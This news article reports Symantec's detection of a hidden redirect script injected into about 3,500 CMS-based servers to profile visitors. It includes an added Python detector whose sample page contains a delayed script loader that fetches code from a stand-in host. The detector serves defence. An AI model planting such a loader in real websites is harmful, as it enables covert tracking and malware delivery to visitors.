
Symantec detects 3,500 servers infected with a malicious script

Symantec reported the worldwide infection of 3,500 public servers with a malicious script that redirects victims to other compromised websites, which could be used to download malware. The company said the activity could be part of a recon effort for future attacks.

The security firm detected the script using the company's Intrusion Prevention System signature. The signature is triggered when a user browses a compromised website and detects when a hidden script injected into that site is used to redirect users to a website hosting malicious code. Symantec said the compromised websites all used the same content management system.

At this time, no malware was associated with this injection attack, and the attack does not lead to any malicious downloads.

“It is likely that the attacks are a reconnaissance activity to learn more about users and utilize that information in another attack. The possibilities for future attacks include the delivery of advertisements, SEO poisoning attacks, or criminals modifying the code to deliver malware and compromise unprotected users,” wrote Christian Tripputi, a security support manager for Symantec.

In the attack, a compromised page is loaded in the user's browser when that person visits the site. The malicious script waits 10 seconds and then runs remote JavaScript code, which then runs several additional scripts in an attempt to hide the malicious script from the victim.

The scripts then collect information including the page title, URL, referrer, Shockwave Flash version, user language, monitor resolution and host IP address.
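For site operators who want to check their own pages for the behavior described above (an inline script that waits and then pulls JavaScript from another host), the following is an added example and not code from Symantec or from the original article. The regular expressions, the 5-second threshold, the `find_delayed_loaders` name and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristics below are assumptions for illustration, not Symantec's IPS signature.
TIMER = re.compile(r"setTimeout\s*\(.*?,\s*(\d+)\s*\)", re.S)
LOADER = re.compile(r"createElement\s*\(\s*['\"]script['\"]|document\.write\s*\(\s*['\"]<script", re.I)
REMOTE = re.compile(r"['\"]((?:https?:)?//[^'\"/\s]+)[^'\"]*['\"]", re.I)
# Constructed page: one harmless timer, one delayed third-party script loader.
SAMPLE = """<html><head><title>Constructed sample</title>
<script>setTimeout(function () { rotateBanner(); }, 10000);</script>
<script>
setTimeout(function () {
  var s = document.createElement('script');
  s.src = '//collector.example.invalid/t.js';
  document.head.appendChild(s);
}, 10000);
</script></head><body></body></html>"""

class InlineScripts(HTMLParser):
    """Collect the bodies of <script> elements that carry no src attribute."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._buf = []
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def find_delayed_loaders(html, site_host, min_delay_ms=5000):
    """Return (delay_ms, host) for inline scripts that wait at least
    min_delay_ms and then load JavaScript from a host other than site_host."""
    parser = InlineScripts()
    parser.feed(html)
    hits = []
    for body in parser.scripts:
        delays = [int(d) for d in TIMER.findall(body)]
        if not delays or max(delays) < min_delay_ms or not LOADER.search(body):
            continue
        for m in REMOTE.finditer(body):
            host = m.group(1).split("//", 1)[1].lower()
            if host != site_host.lower():
                hits.append((max(delays), host))
    return hits
```

A hit is a lead for manual review of the CMS template or database field that emitted the script, since legitimate widgets can also load third-party code on a timer.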

About 75 percent of the infected websites, generally business, .edu and government types, are located in the U.S.
